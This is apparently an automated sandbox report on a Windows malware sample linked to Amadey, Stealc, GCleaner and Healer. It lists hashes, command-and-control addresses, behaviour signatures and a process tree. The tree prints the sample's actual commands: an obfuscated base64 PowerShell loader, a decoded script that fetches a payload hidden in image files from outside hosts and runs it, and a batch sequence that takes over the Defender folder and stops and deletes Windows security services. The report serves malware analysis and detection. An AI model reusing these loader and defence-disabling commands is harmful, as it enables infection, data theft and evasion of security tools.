Resubmissions

26/03/2025, 09:19

250326-lal5mawmt7 10

26/03/2025, 09:11

250326-k54gqa1sex 10

Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
  • submitted
    26/03/2025, 09:11

General

  • Target

    7217bdd25c216cb1d57bcd05dde5bbb5917cabb4b41c090a71ea3f897c36d9a3.exe

  • Size

    1.8MB

  • MD5

    e13b8e511787a1d1fba4df4bef37ed4f

  • SHA1

    4b49c4dbbdd29a5d982fc54fbe1dc8267bd0e81d

  • SHA256

    7217bdd25c216cb1d57bcd05dde5bbb5917cabb4b41c090a71ea3f897c36d9a3

  • SHA512

    7b76b73777db5c8bb990b2d0a533c81ae41457c5e96ae34ab652225ce45297ce15b243665742afe0f041b2c4caf2f3b63b67271298442c7a4537256f1e54d86c

  • SSDEEP

    24576:QAyHpGFysY88QNM7a9oBNcptVNL/fEy9mT6FsCM+EaIte2QZJ1j8E:QZH8E388sM7aiWptVNwlgjI30g

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

stealc

Botnet

trump

C2

http://45.93.20.28

Attributes
  • url_path

    /85a1cacf11314eb8.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs
  • Blocklisted process makes network request 10 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs

    Run Powershell and hide display window.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file 13 IoCs
  • Possible privilege escalation attempt 2 IoCs
  • Stops running service(s) 4 TTPs
  • Checks BIOS information in registry 2 TTPs 18 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 28 IoCs
  • Identifies Wine through registry keys 2 TTPs 9 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 48 IoCs
  • Modifies file permissions 1 TTPs 2 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Windows security modification 2 TTPs 2 IoCs
  • Adds Run key to start application 2 TTPs 8 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
  • AutoIT Executable 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Enumerates processes with tasklist 1 TTPs 6 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 46 IoCs
  • Drops file in Windows directory 32 IoCs
  • Launches sc.exe 38 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 59 IoCs
  • Suspicious behavior: LoadsDriver 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 23 IoCs
  • Suspicious use of FindShellTrayWindow 27 IoCs
  • Suspicious use of SendNotifyMessage 25 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:1200
      • C:\Users\Admin\AppData\Local\Temp\7217bdd25c216cb1d57bcd05dde5bbb5917cabb4b41c090a71ea3f897c36d9a3.exe
        "C:\Users\Admin\AppData\Local\Temp\7217bdd25c216cb1d57bcd05dde5bbb5917cabb4b41c090a71ea3f897c36d9a3.exe"
        2⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Identifies Wine through registry keys
        • Loads dropped DLL
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:2772
        • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
          "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Downloads MZ/PE file
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Loads dropped DLL
          • Adds Run key to start application
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:2840
          • C:\Users\Admin\AppData\Local\Temp\10338680101\Q1DOy22.exe
            "C:\Users\Admin\AppData\Local\Temp\10338680101\Q1DOy22.exe"
            4⤵
            • Executes dropped EXE
            • Adds Run key to start application
            • Suspicious use of WriteProcessMemory
            PID:2288
            • C:\Windows\system32\cmd.exe
              cmd.exe /c 67e3b7493caeb.vbs
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:1456
              • C:\Windows\System32\WScript.exe
                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\67e3b7493caeb.vbs"
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:1888
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@k@EI@eQB0@GU@cw@g@D0@I@@n@Gg@d@B0@Cc@Ow@N@@o@J@BC@Hk@d@Bl@HM@Mg@g@D0@I@@n@H@@cw@6@C8@Lw@n@Ds@DQ@K@CQ@b@Bm@HM@Z@Bm@HM@Z@Bn@C@@PQ@g@C@@J@BC@Hk@d@Bl@HM@I@@r@CQ@QgB5@HQ@ZQBz@DI@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bs@Gk@bgBr@HM@I@@9@C@@Q@@o@Cg@J@Bs@GY@cwBk@GY@cwBk@Gc@I@@r@C@@JwBi@Gk@d@Bi@HU@YwBr@GU@d@@u@G8@cgBn@C8@ZwBm@Gg@Z@Bq@Gs@Z@Bk@C8@agBo@Gg@a@Bo@Gg@a@Bo@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@DI@LgBq@H@@Zw@/@DE@Mw@3@DE@MQ@z@Cc@KQ@s@C@@K@@k@Gw@ZgBz@GQ@ZgBz@GQ@Zw@g@Cs@I@@n@G8@ZgBp@GM@ZQ@z@DY@NQ@u@Gc@aQB0@Gg@dQBi@C4@aQBv@C8@MQ@v@HQ@ZQBz@HQ@LgBq@H@@Zw@n@Ck@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@Gg@I@@9@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bi@GE@cwBl@DY@N@BD@G8@bQBt@GE@bgBk@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBT@HU@YgBz@HQ@cgBp@G4@Zw@o@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@s@C@@J@Bi@GE@cwBl@DY@N@BM@GU@bgBn@HQ@a@Bo@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBD@G8@bgB2@GU@cgB0@F0@Og@6@EY@cgBv@G0@QgBh@HM@ZQ@2@DQ@UwB0@HI@aQBu@Gc@K@@k@GI@YQBz@GU@Ng@0@EM@bwBt@G0@YQBu@GQ@KQ@7@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@b@Bv@GE@Z@Bl@GQ@QQBz@HM@ZQBt@GI@b@B5@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBS@GU@ZgBs@GU@YwB0@Gk@bwBu@C4@QQBz@HM@ZQBt@GI@b@B5@F0@Og@6@Ew@bwBh@GQ@K@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bj@G8@bQBw@HI@ZQBz@HM@ZQBk@EI@eQB0@GU@QQBy@HI@YQB5@C@@PQ@g@Ec@ZQB0@C0@QwBv@G0@c@By@GU@cwBz@GU@Z@BC@Hk@d@Bl@EE@cgBy@GE@eQ@g@C0@YgB5@HQ@ZQBB@HI@cgBh@Hk@I@@k@GU@bgBj@FQ@ZQB4@HQ@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@d@B5@H@@ZQ@g@D0@I@@k@Gw@bwBh@GQ@ZQBk@EE@cwBz@GU@bQBi@Gw@eQ@u@Ec@ZQB0@FQ@eQBw@GU@K@@n@HQ@ZQBz@HQ@c@Bv@Hc@ZQBy@HM@a@Bl@Gw@b@@u@Eg@bwBh@GE@YQBh@GE@YQBz@GQ@bQBl@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@G0@ZQB0@Gg@bwBk@C@@PQ@g@CQ@d@B5@H@@ZQ@u@Ec@ZQB0@E0@ZQB0@Gg@bwBk@Cg@JwBs@GY@cwBn@GU@Z@Bk@GQ@Z@Bk@GQ@Z@Bh@Cc@KQ@u@Ek@bgB2@G8@awBl@Cg@J@Bu@HU@b@Bs@Cw@I@Bb@G8@YgBq@GU@YwB0@Fs@XQBd@C@@K@@n@C@@d@B4@HQ@LgBp@GY@bwBw@GQ@Z@Bk@C8@cwBl@Gw@aQBm@F8@YwBp@Gw@YgB1@H@@Lw@y@DE@MQ@u@DY@Mg@y@C4@M@@2@C4@Mg@2@C8@Lw@6@Cc@L@@g@Cc@M@@n@Cw@I@@n@FM@d@Bh@HI@d@B1@H@@TgBh@G0@ZQ@n@Cw@I@@n@E0@cwBi@HU@aQBs@GQ@Jw@s@C@@Jw@w@Cc@KQ@p@H0@fQ@=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $dosigo.replace('@','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:2468
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $Bytes = 'htt'; $Bytes2 = 'ps://'; $lfsdfsdg = $Bytes +$Bytes2; $links = @(($lfsdfsdg + 'bitbucket.org/gfhdjkdd/jhhhhhhh/downloads/test2.jpg?137113'), ($lfsdfsdg + 'ofice365.github.io/1/test.jpg')); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $endIndex = $imageText.IndexOf($endFlag); $commandBytes = [System.Convert]::FromBase64String($base64Command); $endIndex = $imageText.IndexOf($endFlag); $endIndex = $imageText.IndexOf($endFlag); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $endIndex = $imageText.IndexOf($endFlag); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.ifopddd/selif_cilbup/211.622.06.26//:', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec
                    8⤵
                    • Blocklisted process makes network request
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2212
          • C:\Users\Admin\AppData\Local\Temp\10338700101\apple.exe
            "C:\Users\Admin\AppData\Local\Temp\10338700101\apple.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:1568
            • C:\Users\Admin\AppData\Local\Temp\11.exe
              "C:\Users\Admin\AppData\Local\Temp\11.exe"
              5⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:920
              • C:\Windows\system32\cmd.exe
                "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5B79.tmp\5B89.tmp\5B8A.bat C:\Users\Admin\AppData\Local\Temp\11.exe"
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:1292
                • C:\Users\Admin\AppData\Local\Temp\11.exe
                  "C:\Users\Admin\AppData\Local\Temp\11.exe" go
                  7⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: CmdExeWriteProcessMemorySpam
                  • Suspicious use of WriteProcessMemory
                  PID:904
                  • C:\Windows\system32\cmd.exe
                    "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5C15.tmp\5C16.tmp\5C17.bat C:\Users\Admin\AppData\Local\Temp\11.exe go"
                    8⤵
                    • Drops file in Program Files directory
                    • Suspicious use of WriteProcessMemory
                    PID:2440
                    • C:\Windows\system32\sc.exe
                      sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
                      9⤵
                      • Launches sc.exe
                      PID:1912
                    • C:\Windows\system32\sc.exe
                      sc start ddrver
                      9⤵
                      • Launches sc.exe
                      PID:288
                    • C:\Windows\system32\timeout.exe
                      timeout /t 1
                      9⤵
                      • Delays execution with timeout.exe
                      PID:2496
                    • C:\Windows\system32\sc.exe
                      sc stop ddrver
                      9⤵
                      • Launches sc.exe
                      PID:2344
                    • C:\Windows\system32\sc.exe
                      sc start ddrver
                      9⤵
                      • Launches sc.exe
                      PID:868
                    • C:\Windows\system32\takeown.exe
                      takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
                      9⤵
                      • Possible privilege escalation attempt
                      • Modifies file permissions
                      PID:1128
                    • C:\Windows\system32\icacls.exe
                      icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
                      9⤵
                      • Possible privilege escalation attempt
                      • Modifies file permissions
                      PID:1944
                    • C:\Windows\system32\sc.exe
                      sc stop "WinDefend"
                      9⤵
                      • Launches sc.exe
                      PID:1852
                    • C:\Windows\system32\sc.exe
                      sc delete "WinDefend"
                      9⤵
                      • Launches sc.exe
                      PID:3040
                    • C:\Windows\system32\reg.exe
                      reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
                      9⤵
                        PID:2104
                      • C:\Windows\system32\sc.exe
                        sc stop "MDCoreSvc"
                        9⤵
                        • Launches sc.exe
                        PID:1740
                      • C:\Windows\system32\sc.exe
                        sc delete "MDCoreSvc"
                        9⤵
                        • Launches sc.exe
                        PID:3028
                      • C:\Windows\system32\reg.exe
                        reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
                        9⤵
                          PID:568
                        • C:\Windows\system32\sc.exe
                          sc stop "WdNisSvc"
                          9⤵
                          • Launches sc.exe
                          PID:2936
                        • C:\Windows\system32\sc.exe
                          sc delete "WdNisSvc"
                          9⤵
                          • Launches sc.exe
                          PID:2504
                        • C:\Windows\system32\reg.exe
                          reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
                          9⤵
                            PID:1560
                          • C:\Windows\system32\sc.exe
                            sc stop "Sense"
                            9⤵
                            • Launches sc.exe
                            PID:1584
                          • C:\Windows\system32\sc.exe
                            sc delete "Sense"
                            9⤵
                            • Launches sc.exe
                            PID:964
                          • C:\Windows\system32\reg.exe
                            reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
                            9⤵
                              PID:1448
                            • C:\Windows\system32\sc.exe
                              sc stop "wscsvc"
                              9⤵
                              • Launches sc.exe
                              PID:2256
                            • C:\Windows\system32\sc.exe
                              sc delete "wscsvc"
                              9⤵
                              • Launches sc.exe
                              PID:2540
                            • C:\Windows\system32\reg.exe
                              reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
                              9⤵
                                PID:2996
                              • C:\Windows\system32\sc.exe
                                sc stop "SgrmBroker"
                                9⤵
                                • Launches sc.exe
                                PID:2964
                              • C:\Windows\system32\sc.exe
                                sc delete "SgrmBroker"
                                9⤵
                                • Launches sc.exe
                                PID:2792
                              • C:\Windows\system32\reg.exe
                                reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
                                9⤵
                                  PID:1524
                                • C:\Windows\system32\sc.exe
                                  sc stop "SecurityHealthService"
                                  9⤵
                                  • Launches sc.exe
                                  PID:3060
                                • C:\Windows\system32\sc.exe
                                  sc delete "SecurityHealthService"
                                  9⤵
                                  • Launches sc.exe
                                  PID:2784
                                • C:\Windows\system32\reg.exe
                                  reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
                                  9⤵
                                    PID:2912
                                  • C:\Windows\system32\sc.exe
                                    sc stop "webthreatdefsvc"
                                    9⤵
                                    • Launches sc.exe
                                    PID:2880
                                  • C:\Windows\system32\sc.exe
                                    sc delete "webthreatdefsvc"
                                    9⤵
                                    • Launches sc.exe
                                    PID:2620
                                  • C:\Windows\system32\reg.exe
                                    reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
                                    9⤵
                                      PID:2604
                                    • C:\Windows\system32\sc.exe
                                      sc stop "webthreatdefusersvc"
                                      9⤵
                                      • Launches sc.exe
                                      PID:2748
                                    • C:\Windows\system32\sc.exe
                                      sc delete "webthreatdefusersvc"
                                      9⤵
                                      • Launches sc.exe
                                      PID:2788
                                    • C:\Windows\system32\reg.exe
                                      reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
                                      9⤵
                                        PID:2576
                                      • C:\Windows\system32\sc.exe
                                        sc stop "WdNisDrv"
                                        9⤵
                                        • Launches sc.exe
                                        PID:2804
                                      • C:\Windows\system32\sc.exe
                                        sc delete "WdNisDrv"
                                        9⤵
                                        • Launches sc.exe
                                        PID:2808
                                      • C:\Windows\system32\reg.exe
                                        reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
                                        9⤵
                                          PID:2728
                                        • C:\Windows\system32\sc.exe
                                          sc stop "WdBoot"
                                          9⤵
                                          • Launches sc.exe
                                          PID:2724
                                        • C:\Windows\system32\sc.exe
                                          sc delete "WdBoot"
                                          9⤵
                                          • Launches sc.exe
                                          PID:2836
                                        • C:\Windows\system32\reg.exe
                                          reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
                                          9⤵
                                            PID:2160
                                          • C:\Windows\system32\sc.exe
                                            sc stop "WdFilter"
                                            9⤵
                                            • Launches sc.exe
                                            PID:2796
                                          • C:\Windows\system32\sc.exe
                                            sc delete "WdFilter"
                                            9⤵
                                            • Launches sc.exe
                                            PID:2692
                                          • C:\Windows\system32\reg.exe
                                            reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
                                            9⤵
                                              PID:2360
                                            • C:\Windows\system32\sc.exe
                                              sc stop "SgrmAgent"
                                              9⤵
                                              • Launches sc.exe
                                              PID:2892
                                            • C:\Windows\system32\sc.exe
                                              sc delete "SgrmAgent"
                                              9⤵
                                              • Launches sc.exe
                                              PID:3036
                                            • C:\Windows\system32\reg.exe
                                              reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
                                              9⤵
                                                PID:2780
                                              • C:\Windows\system32\sc.exe
                                                sc stop "MsSecWfp"
                                                9⤵
                                                • Launches sc.exe
                                                PID:2584
                                              • C:\Windows\system32\sc.exe
                                                sc delete "MsSecWfp"
                                                9⤵
                                                • Launches sc.exe
                                                PID:2640
                                              • C:\Windows\system32\reg.exe
                                                reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
                                                9⤵
                                                  PID:2952
                                                • C:\Windows\system32\sc.exe
                                                  sc stop "MsSecFlt"
                                                  9⤵
                                                  • Launches sc.exe
                                                  PID:2548
                                                • C:\Windows\system32\sc.exe
                                                  sc delete "MsSecFlt"
                                                  9⤵
                                                  • Launches sc.exe
                                                  PID:448
                                                • C:\Windows\system32\reg.exe
                                                  reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
                                                  9⤵
                                                    PID:1756
                                                  • C:\Windows\system32\sc.exe
                                                    sc stop "MsSecCore"
                                                    9⤵
                                                    • Launches sc.exe
                                                    PID:308
                                                  • C:\Windows\system32\sc.exe
                                                    sc delete "MsSecCore"
                                                    9⤵
                                                    • Launches sc.exe
                                                    PID:352
                                                  • C:\Windows\system32\reg.exe
